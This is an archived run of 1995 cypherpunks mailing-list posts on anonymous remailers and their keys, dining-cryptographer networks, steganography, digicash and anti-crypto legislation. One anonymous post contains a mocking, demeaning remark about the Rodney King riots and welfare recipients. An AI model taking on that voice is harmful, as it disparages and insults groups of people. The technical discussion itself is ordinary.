> something illegal and a fine of $250,000 is levied, then you may have to
> sell everything you own to pay it, but it's not a RICO seizure.
> 
> --Tim May
> 
EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 16 Jul 95 23:25:43 PDT
To: mix-l@jpunix.com
Subject: Mixmaster@obscura.com back with new keys.
Message-ID: <199507170624.XAA12232@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Mixmaster@obscura.com is back. Obscura crashed last weekend, taking all
data with it. The remailer is running again but the secret keys were
lost.

This remailer is running Mixmaster 2.0.1 and the latest Ghio type1 remailer
for cypherpunk messages.

Here is the mixmaster key:

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

-----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

and here is the pgp key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAzAGIaQAAAEDAJpPdFihCI1Cfpc8njkqOSma/GVvS5nodpTnnff3B3RuZWJN
bEvxC3s8TATo6f5JdXqOkZBXQCK+aHke4LKw+MGNNXBYeWH60NZ0IihVThHeyYqL
f4ZQNJHlMlFfDrQEgQAFEbQqTWl4bWFzdGVyIFJlbWFpbGVyIDxtaXhtYXN0ZXJA
b2JzY3VyYS5jb20+iQEVAwUQMAnzn/Pzr81BVjMVAQEzRQgAk3ansqZb2y8orEim
0igHJpA22J15l6tu5ZihHpnBbXJEqdDKvsp6P/LG+ZDBXa8bGGg7RxZ1xXFqVWSO
kkv9iqcoMWB14VHzC5A6MckhkpUGqPt+HMyUEW/JnGzZ202Z4aaVXOjXMsLf5jo1
VIp94/8nQen+QJThpJLmaNGgl8z60skyXzbtoz93Wy6IZAQYYImeswSrYukO1wC6
FXy0/a3AkDjd7mJiCtA2m7tTxCZr2EBlSu4VemG1APmCTjh2f/wyXNU1iXmTDb7N
QcplTAwpROrdvtBeslE+bzYqWZqipcFHHyW9W6YUVIr18cojt6k5GEVzI9WCEgAO
v+kA1YkAlQMFEDAJ82xVZJN3Wse4ZQEBc7gD/izVs3+jXs3Ze+U+ZVmfO6guUcMU
RB4VsNS6n5BHRm6KS7qXCXxHYc0tehkuHVuGD0riSaS232P0NNmp1D4dzXtUVQCY
BZfMbWX4EooqHGGRAoqPGZuke8pZYfVGARUKFQB8+zqKGhCum8z1sbUPUgzR5bie
Un9sktwsWEJEIcNoiQB1AwUQMAnxfeUyUV8OtASBAQF/5gL+OksEqwyBE+pUZCmN
1AXAmKlRxkd6gybJJl8lXOOa4KVGmSEroYW8pac+TlraJb6j90LvbqJ+7PHuMtHT
84uRna183HDqKOd6NMdwTTimE6ZGueGBB7mwIysaTU8oCZ66
=0s+r
-----END PGP PUBLIC KEY BLOCK-----


   -Lance

-- 
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:29:41 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507170827.BAA12413@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 PM 7/16/95 +0100, Andrew Spring wrote:
>RICO question:  i thought that the idea of RICO is to confiscate assets of
>racketeers that are derived from criminal activities.  PGP and remailer
>software is distributed free.  so would RICO seizures even apply (yes I
>know this doesnt' always stop the FBI)?

You _were_ using that software on a _computer_ weren't you?  Guess it's 
one of your racketeer's tools, so we'll have to take it for ourselves, er, um,
for evidence and protection of national security....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:29:13 PDT
To: Phil Fraering        <cypherpunks@toad.com
Subject: Re: Mods to Dining Cryptographers: legal questions...
Message-ID: <199507170827.BAA12420@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 7/15/95 -0500, Phil Fraering wrote:
>I'm sorry if I was a little mysterious about my reference to
>another use or mode of a DC-net; I'd _love_ to tell the rest of
>you flat-out, and put the idea in the public domain, but I'm
>not sure I _CAN_.
.....
>Are there any patents on Dining-Cryptographers networks that could
>interfere with the placing in the public domain, or the patenting, of
>an improvement to the network system?

Case 1 - you want to be able to patent your stuff yourself.  Case 2 - you don't.
For Case 1, I can't help you much, but US patent law lets you apply for a
patent on something within one year of publication (most other countries don't
allow that - if you publish before applying, you don't get to patent it.)
So publish.  For Case 2, publish.  You could get fancy and use surety.com's
date-stamping service to keep a copy of what and when you published.

If the material you've developed was already invented, and patented, 
by someone else, it's still ok to publish it, you just can't use the stuff
(except for research, etc.)  (I've been burned by this one; I _thought_ my
idea seemed obvious enough that somebody else should have already thought of
it first :-)  So if you're trying to put something in the public domain,
you may want to put a footnote in it saying that you're not making any
claims about other people's previous patent applications, etc.

So, anyway, what's your new idea?
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:29:17 PDT
To: cypherpunks@toad.com
Subject: Re: Deployment
Message-ID: <199507170827.BAA12427@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> > So, anyone want to volunteer to port Privtool to Windows ?
> Uh, pardon my ignorance, but what is privtool, and why is it
> a good thing to port it to windows?
> (As compared to the task of integrating PGP into microsofts
> mail tool.)

It's an open-system mail tool resembling Sun's mailtool with PGP support added.
Open-system tools are one of those vanguard things :-)  
(So are convenient GUI-development tools.)
I no longer have a nearby Sun machine to play on, so I haven't played with it,
but if it's got a well-done interface it's worth porting or stealing concepts
from to include in other systems.  I've heard that Microsoft's new mail tools
are far less brain-damaged than the Microsoft Mail I've grown to know and hate,
which assumes any message that's more than a few lines will be an attached
document with maybe some optional intro and leftover mail headers,
and chokes on messages with more than 30K of text in the body (choking badly
on more than 64K).  (Apparently, part of the reason for this evil is the fault
of Visual Basic and/or Visual C++, which are convenient GUI development
tools...)

On the other hand, integrating it into Free Eudora for Windows would be
pleasant,
if that's doable (I forget it source is available.) 
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:30:35 PDT
To: cypherpunks@toad.com
Subject: Re: A Chronology on crypto bans
Message-ID: <199507170827.BAA12430@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 7/16/95 -0400, Dave Banisar wrote:
>Someone asked why is there such a flurry recently on banning crypto in
>recent months. This is not a recent issue. There have been almost non-stop
>attempts for the last 15 years.

True, though there have been more and louder calls for banning crypto as
it becomes more widely used, and as the Internet and electronic commerce
make its use more relevant.  The number of cats running around outside of bags
has been increasing, so the effort of the politicians to herd them back in
has become more and more noticeable.  

A lot of it has been good public relations but the Good Guys as well -
back in the late 70s, when I started following it, crypto was mostly for spooks,
bankers, and academic math nerds*; PGP and the government's persecution of Phil
have made a lot of people aware that the stakes are high and the Bad Guys
are serious, 
and the Clipper Chip sounded enough like "The Feds want to tap my phone"
that the general public could understand, a bit, that this was something
that affected them...

It's also been technology - real crypto needs computers, and computers have
gone from million-dollar room-fillers that you might use at work or university
to appliances you can buy at WalMart, like tv sets, which your kids use for
school,
if you don't count game machines, which your kids can buy at K-mart...
Suddenly a third of the country's got a machine they can do real crypto on,
and for 10 bucks a month they can be on a world-wide email network.
And it's mostly the _rich_ third of the country, who might want to do their
home banking somewhere a bit less taxing than before.

Oh, yeah, there's also drugs - folks might want to use the Home Shopping
Internet
for more than just fake jewelry :-)

* at the time, I was an academic math nerd designing banking networks
at the phone company, and my department also did studies for spooks...
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 17 Jul 95 00:39:07 PDT
To: ecm@ai.mit.edu
Subject: Re: ECM list.
In-Reply-To: <9507170051.AA06498@grape-nuts>
Message-ID: <199507170738.BAA25016@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

>  For example, you might be holding $85.73 in digicash (having played the 
> various slot machine pages, maybe bought a sky photograph from the Bradford
> telescope).


That's just about right.


>  What would it take for you to buy more digicash?  How about to sell it?


Right now I am thinking of e$ as a "collectors item" or a fun thing to
brag about in some distant year.  I'm offering US$1.00 for e$15.00, but
I will quit offering that price once I run out of US$ or decide that I
have enough e$!


I think that the ecm market is probably composed of very few people who
mostly want to buy, and is therefore not a high-volume market!  If the ecm
market got a link from the DigiCash home page (which I'm sure it could do)
then you would probably get lots of people who just got their free e$100.00
and who are willing to sell part of it after having experienced the wonders
of the slot machines and the "e$0.01-per-move tic-tac-toe" games.
  Could we set up a WWW version of the ecm market, listing latest offers
to anyone with a WWW browser?  Things might really pick up-- at least for
us buyers!


I'm also considering other strategies for gaining e$--  offering a service
on the DigiCash "cybershops" page, or just going to all my e-mail using
friends, showing them how to get their free e$100.00, and then begging them
to give me half of it.  (Finder's fee?  Friendly gift?)


Possibly I shouldn't have posted the above and given my e$-collecting
competitors the idea, because eventually DigiCash is going to quit giving
out freebies!  Hopefully my friends will get on the ball and acquire their
freebies before that point!  :-)   [mental note to add some of said friends
to the Cc: line...]


Bryce
P.S.  Oh great.  My "friends" are asking for the $1.00 for e$15.00 deal...


signatures follow

 /=============------------
  Bryce Wilcox, Programmer               [THIS SPACE FOR RENT]
  bryce.wilcox@colorado.edu
  ------------=============/    E-mail is between you and me-- use PGP!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMAoTRZCUT4gUihHlAQEBMgQAueueOvkxSsVRBS20k49zUhOr8wa/CKcD
vqsKLhHoeWhrXuYMKV5KTGgQ86TLwiu5n1C0fjomcJ+86UT1Py09i+yfeBj956hH
sMFoGHgu4jKtQPZ94FsmsCzfDXPF6htnuOnQYjSrAydckomZoiQfPICDFRGeiSTp
FbXeDMRMrMs=
=1z8A
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sun, 16 Jul 95 17:16:33 PDT
To: cypherpunks@toad.com
Subject: Re: The Recent Flurry of Anit-Crypto Activity... Why?
In-Reply-To: <3u6oj5$fir@nntp.crl.com>
Message-ID: <199507170016.CAA19393@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


from 'Buzz White': 
> 
> More to the point, the question  "Why Now?" comes to my mind.
> 
> So, I posit that this legislative swirl is an attempt to squash true "crypto
> for the masses" (via real commercial integration) before it gets out "into
> the world". 
> 
> Anybody have a better analysis of the "Why Now" part of the question?
 
Good theory, but I think the major reason is more obvious. We have 
elected "representatives", led by a complete slimeball president, that
want to usurp every bit of liberty we have. Money, soul, healthcare,
private property, you name it. The sooner they can grab it, the more
completely they can control us. Crypto, digicash, and remailers work
against their attempts, so they try to stop them. The more they want
something from us, the stronger our effort must be not to let them have
it. They think we need their "help" to live our lives, and that without 
we would be helpless. They think we're all like those pathetic people in 
LA who had no clue what to do with their welfare checks when check cashing
stores were torched during the Rod-knee King Bar-B-Q and Block Party. The
sad part is that as more and more people are absorbed into the welfare
state, fewer remain to assert our right to personal liberty and our
right "to be left alone". We're likely to lose by attrition.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 18 Jul 95 15:11:35 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <199507170016.TAA23019@arnet.arn.net>
Message-ID: <9507170819.AA16469@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Expecially if the form letter generated would be randomly selected
>from parallel word streams.  For example:
[...]
>  You get the idea.

Rather than spend five minutes writing something on your own you'd end
up something that looks totally fake.  I believe that what is going on
would be discerned by a staffer in moments. Crap like this is called
"astroturf" by staffers, to distinguish it from "grass roots" efforts.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Tue, 18 Jul 95 18:20:36 PDT
To: stewarts@ix.netcom.com
Subject: Here it is; bi-directional dining cryptographers
In-Reply-To: <199507170827.BAA12420@ix6.ix.netcom.com>
Message-ID: <199507171153.AA11135@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill, I'll probably go down to the notary's this morning to get the
thing registered; I don't want to pay $ 50.00 to surety for what's
likely to be a one-shot deal.

And I've been leaning towards the side of releasing it into the public
domain anyway, so here goes:

(And besides, I can't believe everyone else missed this; one of you
has got to know about this already):

If Alice and Bob are members of a reasonably non-compromised and
free of colluders dining-cryptographers network, with a protocol for
reserving blocks for the transmission of data packets, then if they
both send a data packet in the same block, they can each read what
the other is saying but to the rest of the DC-net it is garbled.

Since what is broadcast is the XOR of Alice's and Bob's data, Alice can
read Bob's data by XOR'ing the output of the DC-net with her attempted
input; Bob can recover her data the same way.

Comments?

(At the very least, it doubles the bandwidth for the two participants...)

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew Roos" <ANDREWR@real3.realtime.co.za>
Date: Tue, 18 Jul 95 18:39:57 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: Here it is; bi-directional dining cryptographers
Message-ID: <C189311569@real3.realtime.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering  <pgf@tyrell.net> observes:

> If Alice and Bob are members of a reasonably non-compromised and
> free of colluders dining-cryptographers network, with a protocol for
> reserving blocks for the transmission of data packets, then if they
> both send a data packet in the same block, they can each read what
> the other is saying but to the rest of the DC-net it is garbled.
> 
> Since what is broadcast is the XOR of Alice's and Bob's data, Alice can
> read Bob's data by XOR'ing the output of the DC-net with her attempted
> input; Bob can recover her data the same way.
>
> Comments?

I haven't been following the DC thread so forgive me if I've missed 
something... 

If the objective is to keep what Alice and Bob say SECRET then we 
have a problem if the entropy per bit of Alice's data plus the 
entropy per bit of Bob's data is less than one bit, because then 
there is only one likely decryption of the "ciphertext", which will 
reveal what both Alice and Bob are saying.

The system is analegous to a variation on the old Vigenere/Beaufort 
cipher where instead of using a single repeated keyword to generate 
to encryption stream, you use another "plaintext" message such as a 
passage from a book which is known to both correspondents. (Here the 
addition is done mod 26 instead of mod 2).

Since the entropy of natural language is 1-1.5 bits/char, the entropy of two 
natural language texts added together is 2-3 bits per char, while the 
no of ciphertext bits is about 5 bits per char, so there remains 2-3 
bits per char of redundancy in the text, which can (quite easily) be 
used to break the system even on a ciphertext-only basis.

One way to do this is to search for "probable words" of one side of 
the conversation, then see what the other text would have to have 
been to generate the known ciphertext, and if this other text makes 
sense then bingo, we have an initial break, and you can usually 
extend this quite easily by extending one text, then seing what this 
gives for the other, extending that, and so on.

> (At the very least, it doubles the bandwidth for the two participants...)
I have to agree here, though!

Andrew
___________________________________________________________________________

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)

Andrew Roos                                                 Realtime
                                                            PO Box 15170
                                                            Vlaeburg 8018
Phone: +27-21-244350                                        Cape Town                                             Cape Town
Fax:   +27-21-221507                                        South Africa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 17 Jul 95 06:50:38 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199507171350.GAA13217@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 17 Jul 95 6:00:03 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *+*+****+***    14:18  99.99%
rmadillo remailer@armadillo.com           +++++++++++*    49:27  99.99%
spook    remailer@spook.alias.net         ********--**  1:32:17  99.99%
flame    remailer@flame.alias.net         ++++++++-+++    57:13  99.99%
syrinx   syrinx@c2.org                    -------+---   1:44:52  99.99%
replay   remailer@replay.com              *+*+**+*+***    13:59  99.95%
vox      remail@vox.xs4all.nl             -..--.-.---- 12:41:56  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           .**+*#*###*-    54:07  99.90%
crown    mixmaster@kether.alias.net        --------+-   1:12:09  99.89%
portal   hfinney@shell.portal.com         *****#*#####     2:18  99.82%
alumni   hal@alumni.caltech.edu           *****#*#*#*#     3:02  99.82%
vishnu   mixmaster@vishnu.alias.net       -**+** ++***    20:02  98.62%
gondolin mixmaster@gondolin.org           -**-**++*---  1:17:43  98.56%
c2       remail@c2.org                     -*++++++-++    42:52  98.03%
extropia remail@extropia.wimsey.com       -..--.-_ --  14:50:37  97.80%
ideath   remailer@ideath.goldenbear.com   _ --......   17:04:28  96.35%
ford     remailer@bi-node.zerberus.de            #-#+#  1:52:55  96.09%
hroller  hroller@c2.org                   ++***# +*-++    12:53  94.98%
penet    anon@anon.penet.fi               --+++-- --++  2:59:39  92.16%
rebma    remailer@rebma.mn.org            -_++_.-+--+  15:25:46  91.39%
rahul    homer@rahul.net                  *++*+++*##+-    10:33  99.94%
tower    remailer@tower.techwood.org                       6:44   1.46%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 18 Jul 95 18:55:53 PDT
To: Andrew Roos <ANDREWR@real3.realtime.co.za>
Subject: Re: Here it is; bi-directional dining cryptographers
Message-ID: <Pine.3.89.9507171327.A3308-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 17 Jul 1995, Andrew Roos wrote:

> If the objective is to keep what Alice and Bob say SECRET then we
> have a problem if the entropy per bit of Alice's data plus the
> entropy per bit of Bob's data is less than one bit, because then
> there is only one likely decryption of the "ciphertext", which will
> reveal what both Alice and Bob are saying.

Yes, but presumably it's expected that they would be using secure
encryption on the messages that they're sending. That might still provide
some information about the message for traffic analysis, e.g. if you send
a PGP message you have your key-id at the beginning, and if you knew the 
keys of all members of the DC-net you could XOR them and see who's 
talking to who.
 
I'd have thought the most significant problem would be reserving the
blocks in an anonymous fashion while not allowing denial-of-service
attacks. 

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 17 Jul 95 03:58:13 PDT
To: cypherpunks@toad.com
Subject: NSA and NatSec Looks
Message-ID: <199507171058.GAA07387@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a pretty good recent overview of NSA -- history, 
organization, operations and, best, facilities -- at:


     URL: http://www.fas.org/pub/gen/fas/irp/nsa/


This is part of the Federation of American Scientists (FAS) web 
site, cited here by Jim Gillogly in connection with the VENONA 
papers.


There are links to a bounty of other information on national 
security and governmental secrecy.


Among many sweetmeats, the homepage on "Cyberstrategy" may be 
of interest (John Pike's project):


     URL: http://www.fas.org/pub/gen/iswg/cyberstr.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 05:57:23 PDT
To: andrewr@realtime.co.za
Subject: Here it is; bi-directional dining cryptographers
In-Reply-To: <C189311569@real3.realtime.co.za>
Message-ID: <199507171252.AA14868@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Andrew, in the longer version of the description, I postulated that
the data broadcast by Alice and Bob would be compressed and without
headers; I was hoping that would be enough to defeat any likely
cryptanalysis.

Hmm... maybe some other format.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 05:58:25 PDT
To: andrewr@realtime.co.za
Subject: Here it is; bi-directional dining cryptographers
In-Reply-To: <C189311569@real3.realtime.co.za>
Message-ID: <199507171253.AA14941@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


BTW, they're not added together per se; they're XOR'd together.
Does this make a difference?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Mon, 17 Jul 95 22:47:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Stego Standards Silly ? (
In-Reply-To: <8AD5238.000300015F.uuout@famend.com>
Message-ID: <9507171402.AA22064@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Monster@FAmend.Com writes:
>   Not obvious at all. You encrypt and sign as usual, stego the resultant
> output, and perhaps include in the stego routines some kind of CRC or
> hash if you like. But the point is that the signature still works to
> indicate whether the message was tampered with or not.
> 
>   If we posit a MITM, he can tamper with cyphertext =or= stegotext, but
> he can't defeat the signature. I would recieve a GIF which my stego
> software would turn into a file that PGP would puke on, telling me that
> Someone Is Messing With My Mail.

Sure -- for most message passing applications, tampering in transit would
also lead to noticeably corrupted cleartext, when the stegoed ciphertext
is decrypted. Again, PGP pukes, or perhaps Stealth PGP gives me something
obliterated when it decrypts. See my comments below, however.

>   I would not, of course, be able to reveal this fact directly. However,
> I could ask my correspondent to re-send the GIF, and when it comes out
> different in EVERY SINGLE LSB, I have proof of tampering.

Well, you could do that regardless of what is or isn't stegoed into the
carrier image. I'm arguing that perhaps the govt. (or whomever) will be
far less sympathetic to such in-stego-channel evidence of doctoring. 

I still see an obstacle to this approach, though. If we want to try to
foil traffic analysis, then we need people routinely to dispatch ghost
messages. Some of these should go to people with whom the sender is not trying
to communicate. When Karen gets a GIF in the mail, she needs to decide whether
its LSBs are significant (semantically speaking :) or not. If they decrypt
into something meaningful, QED; if not, what to do ?  "Sufficiently
advanced communication is indistinguishable from noise" is a double-edged
sword, after all. Establishing that communication is really being attempted
is trickier under these conditions.

I think I need to clarify my threat model. I'm positing a scenario in which
transmission of ciphertext and stegoed anything is illegal, but transmission
and use of "conspicuous" digital signatures is legal. Furthermore, the govt.
sanitizes the LSBs of digital images for our protection, perhaps distorting
a mean of X% of the LSBs of a mean of Y% of transmitted images. Out-of-stego-
channel checksummation would IMHO be crucial in such a situation.  

-Futplex <futplex@pseudonym.com>   "A kiss and a hug and a couple of f*cks: 
                                    being in love really sucks" -Meryn Cadell



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 17 Jul 95 08:34:21 PDT
To: cypherpunks@toad.com
Subject: "Zodiac"
Message-ID: <199507171534.IAA22791@well.com>
MIME-Version: 1.0
Content-Type: text/plain



 Neal Stephenson's  novel "Zodiac" (an Eco-thriller) has been re-
released in a new paperback edition. I loved it!

ObCrypto: you'll have to read the book to find out...

Ok....actually none, but Neal's fans here on the list will enjoy
the book!

Flame away....

Brian D Williams
Cypherpatriot

" I'm not a spin Doctor, but I play one on the Internet."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Mon, 17 Jul 95 00:35:40 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD5238.000300015E.uuout@famend.com>
Message-ID: <199507170735.IAA06713@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



MONTY HARDER writes:

| Anyone who has read MAD Magazine could put such together. As an added
| bonus, use variable margin settings, and none of the letters would be
| exactly the same. Appropriate Imail => FAX software on a puter in DC
| (local call that way) with the phone number of the sender filled in on
| the top line for ID (izzat legal?) so it doesn't look like a form letter
| at all.

Plus - choose the fonts & point sizes at random too ? :-)

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
